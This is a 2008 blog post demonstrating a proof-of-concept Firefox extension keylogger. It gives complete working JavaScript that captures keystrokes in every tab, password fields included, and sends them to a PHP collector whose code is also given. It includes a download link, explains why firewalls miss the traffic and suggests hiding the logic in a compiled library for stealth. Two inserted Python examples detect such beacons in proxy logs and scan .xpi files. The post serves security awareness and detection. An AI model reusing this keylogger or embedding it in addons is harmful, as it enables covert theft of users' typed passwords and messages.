Wednesday, April 16, 2008

Firefox Addons own ya - Keylogger POC

| Armando Romeo |
This was a project I meant to carry out last year, when I started learning the capabilities of coding in the Gecko environment to create Firefox addons.
I was working on creating an addon capable of digitally signing documents easily from the web browser interface using certificates.
For this post I prepared a proof of concept to demonstrate how powerful addon coding can be, and how malicious code can be embedded in your Firefox without antivirus or firewall even noticing it.


Now attention here, forget the pic above.
Not everyone is aware of these capabilities, and people tend to install any kind of addon/style on Firefox from untrusted (or unverified) third parties.
Most of the Firefox addons you find on the net are not signed, and almost all of them are not validated or checked for malicious code.

My small POC consists of a keylogger written in JavaScript and embedded into the Firefox browser in the form of an extension. This code can be injected into any known/famous addon without anyone noticing: it raises no warnings from antivirus software (it is just legitimate JavaScript) and none from firewalls, since the keystroke logs are sent through Firefox itself on port 80 to a malicious server.



Firewalls allow Firefox on port 80 if you want to browse the internet, so there is no way to understand what's going on under the hood unless you track all the packets leaving your network interface (or run them through a logging proxy).
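The packets do leave the machine in the clear, though, so anything that records outbound HTTP (a proxy, a gateway log) sees the exfiltration. The following is an added example, not code from the post: it generates a constructed Squid-style access log in which the PoC's GET beacons (one every 51 keystrokes, as the extension buffers them) are mixed with normal browsing, then flags any client that keeps hitting the same endpoint with a long query value and reassembles what was typed. The log format, IPs, the evil.example.net host and the thresholds are assumptions for illustration.

```python
"""Spot keystroke-exfiltration beacons in an outbound HTTP proxy log.

Added example, not part of the original post. Log format, hosts, IPs and
thresholds are assumptions; the sample log is constructed below.
"""
import re
from collections import defaultdict
from urllib.parse import quote, urlsplit, parse_qsl

BUFFER = 51          # the PoC flushes once key_str.length > 50
MIN_PARAM_LEN = 40   # assumed: a query value this long is worth a look
MIN_HITS = 3         # assumed: same client, same endpoint, repeated

# Constructed keystrokes the victim "typed"; 168 chars -> three full beacons,
# with the last 15 chars still sitting in the extension's buffer.
KEYSTROKES = ("dear john, my password is hunter2 and the pin is 1234. "
              "please do not share it with anyone. meeting tomorrow at 10 "
              "in the usual room, bring the signed contract with you.")


def make_sample_log():
    """Constructed Squid-style lines: '<epoch> <client> <method> <url>'."""
    lines = []
    t = 1208300000.0
    lines.append(f"{t:.3f} 10.0.0.5 GET http://www.example.com/index.html")
    # only full buffers are sent, exactly like the extension
    for i in range(0, len(KEYSTROKES) - BUFFER + 1, BUFFER):
        chunk = KEYSTROKES[i:i + BUFFER]
        t += 7.5
        lines.append(f"{t:.3f} 10.0.0.5 GET http://www.example.com/page{i}.html")
        t += 2.0
        lines.append(f"{t:.3f} 10.0.0.5 GET "
                     f"http://evil.example.net/hackerscenter/log.php?c={quote(chunk)}")
    lines.append(f"{t + 1:.3f} 10.0.0.7 GET http://www.example.com/search?q=firefox")
    return "\n".join(lines)


LINE_RE = re.compile(r"^(?P<ts>\d+\.\d+) (?P<client>\S+) (?P<method>\S+) (?P<url>\S+)$")


def parse_line(line):
    m = LINE_RE.match(line)
    if not m:
        return None
    return float(m["ts"]), m["client"], m["method"], m["url"]


def find_beacons(log_text, min_param_len=MIN_PARAM_LEN, min_hits=MIN_HITS):
    """Group requests by (client, endpoint, query parameter) and flag groups
    where a long value keeps being sent. The reassembled payload is what a
    proxy operator could read straight out of the log."""
    groups = defaultdict(list)
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        ts, client, _method, url = rec
        parts = urlsplit(url)
        endpoint = f"{parts.scheme}://{parts.netloc}{parts.path}"
        for name, value in parse_qsl(parts.query, keep_blank_values=True):
            if len(value) >= min_param_len:
                groups[(client, endpoint, name)].append((ts, value))
    findings = []
    for (client, endpoint, name), hits in sorted(groups.items()):
        if len(hits) >= min_hits:
            hits.sort()                      # time order = typing order
            findings.append({"client": client, "endpoint": endpoint, "param": name,
                             "hits": len(hits),
                             "payload": "".join(v for _, v in hits)})
    return findings


if __name__ == "__main__":
    for f in find_beacons(make_sample_log()):
        print(f"{f['client']} -> {f['endpoint']} ({f['hits']} beacons)")
        print("  typed:", f["payload"])
```

The detector keys on behaviour rather than on the PoC's URL, so a renamed log.php or a different host still trips it; raising the buffer size or switching to POST in the extension would need the thresholds or the parsed fields adjusted accordingly.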

The POC is an installable extension that, once installed, doesn't add anything to the Firefox appearance.

Get it here

It adds an event listener for the keypress event to the document object, buffers the keystrokes and then sends them to a server that collects them.

Moreover, no warning about an external page loading is shown in the browser status bar, since the call is made through XMLHttpRequest rather than an iframe.

To test the proof of concept I created a server-side PHP file that listens for keystrokes and saves them to a file. The file is log.php in the above zip.

A few lines of code, as simple as:

<?php
// append whatever the extension sent in ?c=... to log.txt
// (the PoC deliberately does no validation of what arrives)
$fh = fopen("log.txt", "a+");
if (isset($_GET['c'])) {
    fwrite($fh, $_GET['c']);
}
fclose($fh);

This must be put on localhost under a folder named "hackerscenter" and called log.php, so you will need a local web server in order to test it.

That is, http://localhost/hackerscenter/log.php must be reachable by the extension.

The most important part of the keylogger is this piece of JavaScript code (the content of the extension):

// runs in the chrome overlay, so key events from every tab bubble up to it
document.addEventListener("keypress", onkey, false);
var key_str = '';

function onkey(e) {

    // append the character of this keystroke to the buffer
    key_str += String.fromCharCode(e.charCode);

    if (key_str.length > 50) {

        var http = new XMLHttpRequest();
        // encodeURIComponent keeps '&', '#', '+' and friends from breaking the query string
        http.open("GET", "http://localhost/hackerscenter/log.php?c=" + encodeURIComponent(key_str), true);
        http.send(null);
        key_str = '';
    }

}

On the first line we add an event listener for the keypress event. Every time a key is pressed, the onkey() function is called and the event object is passed to it.

Through the event object we retrieve the character pressed with e.charCode.
We buffer the keystrokes until we exceed 50 characters and then make a call to our logger through XMLHttpRequest().
Once the buffer is sent it gets flushed. Small, easy and powerful.
Note that because the listener is registered in the extension's chrome overlay rather than in a web page, it sees keystrokes from every tab, password fields included, and the chrome-privileged XMLHttpRequest is not bound by the same-origin policy, so the log can go to any host.


There are mainly two ways to embed malicious code into Firefox.
One uses plain JavaScript like the above, which anyone can read, since a Firefox extension .xpi is just a .zip (rename it to .zip and you can see the actual contents) and the modules are just XML and JavaScript.
This is the way I followed for this quick POC.
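Since an .xpi is only a zip of XML and JavaScript, the readability cuts both ways: the same thing that lets anyone inject code lets anyone inspect an addon before installing it. The following is an added example, not the post's code: it builds a constructed .xpi in memory (install.rdf, chrome.manifest, an overlay and the keylogger script from this post) and then scans it the way you would scan a downloaded addon, looking for a key event listener combined with an outbound request, any hard-coded hosts, and native-code loading. The extension id, file layout and indicator list are assumptions modelled on the Firefox 2/3 install.rdf + chrome.manifest format.

```python
"""Unpack a Firefox .xpi (it is only a zip) and grep its scripts for the
keylogger pattern: a key event listener plus an outbound request.

Added example, not the post's code. The bundled extension is constructed in
memory; its id, file names and overlay layout are assumptions.
"""
import io
import re
import zipfile

# the post's keylogger, dropped into a chrome overlay script
OVERLAY_JS = r'''
document.addEventListener("keypress", onkey, false);
var key_str = '';
function onkey(e) {
  key_str += String.fromCharCode(e.charCode);
  if (key_str.length > 50) {
    var http = new XMLHttpRequest();
    http.open("GET", "http://localhost/hackerscenter/log.php?c=" + key_str, true);
    http.send(null);
    key_str = '';
  }
}
'''

INSTALL_RDF = '''<?xml version="1.0"?>
<RDF xmlns="http://www.w3.org/1999/02/22-rdf-syntax-ns#"
     xmlns:em="http://www.mozilla.org/2004/em-rdf#">
  <Description about="urn:mozilla:install-manifest">
    <em:id>keylogger-poc@example.invalid</em:id>
    <em:name>Harmless Looking Addon</em:name>
    <em:version>1.0</em:version>
  </Description>
</RDF>
'''

# overlaying browser.xul makes the script run in every browser window
CHROME_MANIFEST = ("content hackerscenter content/\n"
                   "overlay chrome://browser/content/browser.xul "
                   "chrome://hackerscenter/content/overlay.xul\n")

OVERLAY_XUL = ('<?xml version="1.0"?>\n'
               '<overlay id="hc-overlay" '
               'xmlns="http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul">\n'
               '  <script type="application/x-javascript" '
               'src="chrome://hackerscenter/content/overlay.js"/>\n'
               '</overlay>\n')


def build_sample_xpi():
    """Constructed .xpi as bytes (what you would get from 'Get it here')."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("install.rdf", INSTALL_RDF)
        z.writestr("chrome.manifest", CHROME_MANIFEST)
        z.writestr("content/overlay.xul", OVERLAY_XUL)
        z.writestr("content/overlay.js", OVERLAY_JS)
    return buf.getvalue()


INDICATORS = {
    "key_listener": re.compile(r'addEventListener\s*\(\s*["\']key(?:press|down|up)["\']'),
    "xhr": re.compile(r'\bXMLHttpRequest\b'),
    "native_code": re.compile(r'Components\.classes|ctypes\.open'),  # the "C++ library" route
}
URL_RE = re.compile(r'https?://([A-Za-z0-9.\-]+)')
SCRIPT_LIKE = (".js", ".jsm", ".xul", ".xhtml", ".html")


def scan_xpi(xpi_bytes):
    """Return {member: {...}} for every script-like member that matches an
    indicator. 'keylogger_pattern' is set when one file both listens for keys
    and talks to the network."""
    report = {}
    with zipfile.ZipFile(io.BytesIO(xpi_bytes)) as z:
        for name in z.namelist():
            if not name.lower().endswith(SCRIPT_LIKE):
                continue
            text = z.read(name).decode("utf-8", errors="replace")
            hits = [k for k, rx in INDICATORS.items() if rx.search(text)]
            if hits:
                report[name] = {"indicators": hits,
                                "hosts": sorted(set(URL_RE.findall(text))),
                                "keylogger_pattern": "key_listener" in hits and "xhr" in hits}
    return report


def overlays_browser_chrome(xpi_bytes):
    """True if chrome.manifest overlays browser.xul, i.e. the code runs in every window."""
    with zipfile.ZipFile(io.BytesIO(xpi_bytes)) as z:
        if "chrome.manifest" not in z.namelist():
            return False
        manifest = z.read("chrome.manifest").decode("utf-8", errors="replace")
    return any(line.split()[:2] == ["overlay", "chrome://browser/content/browser.xul"]
               for line in manifest.splitlines() if line.strip())


if __name__ == "__main__":
    xpi = build_sample_xpi()
    print("overlays browser.xul:", overlays_browser_chrome(xpi))
    for member, info in scan_xpi(xpi).items():
        print(member, info)
```

To check a real download, replace build_sample_xpi() with open("addon.xpi", "rb").read(). The regexes are deliberately simple; obfuscated or string-built calls (for example "XML" + "HttpRequest") slip past them, which is part of the author's point about the compiled-library route being harder to audit.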

The other option is to have our JavaScript load a C++ or Java library and have that library do the dirty work.

In this case reverse engineering of the library would be required, not always an easy task, so this method makes the code stealthier.
There are many examples on the net of loading a C++ DLL from JavaScript in the Gecko environment.
In the end this is how Firefox itself is built: styling and appearance are rendered through XUL (a powerful but easy XML language for application GUIs) and CSS, and the more complicated functions are left to external compiled libraries loaded and called from JavaScript code.

Probably this is not a completely new invention of mine, but it should demonstrate that this is easy to do and that Firefox addons are no less dangerous than executables.

I would add that since the external requests are carried out by Firefox, this is even better (worse) than using an executable, about which any application firewall/antivirus would complain.

Note: to test the above in a development Firefox environment without using your everyday browser, follow these easy steps:
1. close all Firefox windows
2. from a shell run c:\mozilla dir\firefox.exe -p (this opens the profile manager)
3. create a new profile and launch it
4. install and test the POC from within this new Firefox profile

To go back to your previous default Firefox profile, close all windows and repeat step 2, choosing to run Firefox with your default profile.


My research continues, as malicious code in Firefox addons can harm web applications, defeat CSRF defenses and play with cookies.
I'm still playing with it, so you now know how I will spend my next Saturday night. Enjoy... and don't forget to add your comment if you like our prizes for the best commenter.
